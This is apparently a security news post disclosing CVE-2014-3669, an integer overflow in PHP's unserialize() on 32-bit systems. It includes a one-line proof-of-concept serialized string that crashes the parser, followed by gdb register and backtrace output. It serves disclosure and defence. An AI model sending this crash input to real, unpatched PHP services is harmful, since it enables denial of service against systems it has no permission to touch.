A Recent bug discovered in the PHP allows integer overflow in unserialize() PHP

The vulnerability discovered by Security Researcher Symeon Paraschoudis of htbridge allows integer overflow in unserialize() PHP (version <= 5.6.1, 5.5.17, 5.4.33) on 32 bit Systems.

The Researcher used radamsa fuzzer (fuzzer for both text based generations and also binary file format mutations) and a python script created by him which uses the python-ptrace signal handling module and allows to catch any crashes and categorizes them depending on the signal number.

POC:

<?phpunserialize(‘C:3:”GMP”:18446744075857035259:{}’);?>

Result:

The bug exposes serializer to user-controlled data and can trigger a crash when parsing specially crafted serialized data with the [unserialized].

gdb$ r poc.php

Starting program: /home/user/Desktop/php-5.5.17/sapi/cli/php poc.php

[Thread debugging using libthread_db enabled]

Using host libthread_db library “/lib/i386-linux-gnu/libthread_db.so.1”. Warning: Class __PHP_Incomplete_Class has no unserializer in /home/user/Desktop/poc.php on line 2 Program received signal SIGSEGV, Segmentation fault.

————————————————————————–[regs]

EAX: 0x3510DAB3 EBX: 0xB510C74C ECX: 0x3510DAB4 EDX: 0xBFFFBA88 o d I t s z A p C

ESI: 0x00000000 EDI: 0x00000000 EBP: 0xBFFFB918 ESP: 0xBFFFB918 EIP: 0x0850505F

CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B

————————————————————————–[code]

=> 0x850505f <finish_nested_data+16>: movzx eax,BYTE PTR [eax]

0x8505062 <finish_nested_data+19>: cmp al,0x7d

…. snip ….

——————————————————————————–

0x0850505f in finish_nested_data (rval=0xbfffbab4, p=0xbfffba88, max=0xb510dab9 “”, var_hash=0xbfffba84, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/ext/standard/var_unserializer.c:356

356 if (*((*p)++) == ‘}’) gdb$ bt

#0 0x0850505f in finish_nested_data (rval=0xbfffbab4, p=0xbfffba88, max=0xb510dab9 “”, var_hash=0xbfffba84, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/ext/standard/var_unserializer.c:356

#1 0x085051bb in object_custom (rval=0xbfffbab4, p=0xbfffba88, max=0xb510dab9 “”, var_hash=0xbfffba84, tsrm_ls=0x8c81338, ce=0x8da10d0) at /home/user/Desktop/php-5.5.17/ext/standard/var_unserializer.c:387

#2 0x085062cb in php_var_unserialize (rval=0xbfffbab4, p=0xbfffba88, max=0xb510dab9 “”, var_hash=0xbfffba84, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/ext/standard/var_unserializer.c:738

#3 0x084f264a in zif_unserialize (ht=0x1, return_value=0xb510c74c, return_value_ptr=0x0, this_ptr=0x0, return_value_used=0x0, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/ext/standard/var.c:965

#4 0x0862eeda in zend_do_fcall_common_helper_SPEC (execute_data=0xb50ef08c, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/Zend/zend_vm_execute.h:550

#5 0x08633b66 in ZEND_DO_FCALL_SPEC_CONST_HANDLER (execute_data=0xb50ef08c, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/Zend/zend_vm_execute.h:2332

#6 0x0862e411 in execute_ex (execute_data=0xb50ef08c, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/Zend/zend_vm_execute.h:363

#7 0x0862e4cf in zend_execute (op_array=0xb510cff0, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/Zend/zend_vm_execute.h:388

#8 0x085f1f1d in zend_execute_scripts (type=0x8, tsrm_ls=0x8c81338, retval=0x0, file_count=0x3) at /home/user/Desktop/php-5.5.17/Zend/zend.c:1330

#9 0x08556b7e in php_execute_script (primary_file=0xbfffeee4, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/main/main.c:2506

#10 0x0869dee7 in do_cli (argc=0x2, argv=0x8c812a0, tsrm_ls=0x8c81338) at /home/user/Desktop/php-5.5.17/sapi/cli/php_cli.c:994

#11 0x0869f279 in main (argc=0x2, argv=0x8c812a0) at /home/user/Desktop/php-5.5.17/sapi/cli/php_cli.c:1378

The Vulnerability has been allotted “CVE-2014-3669” and a patch has been released by the PHP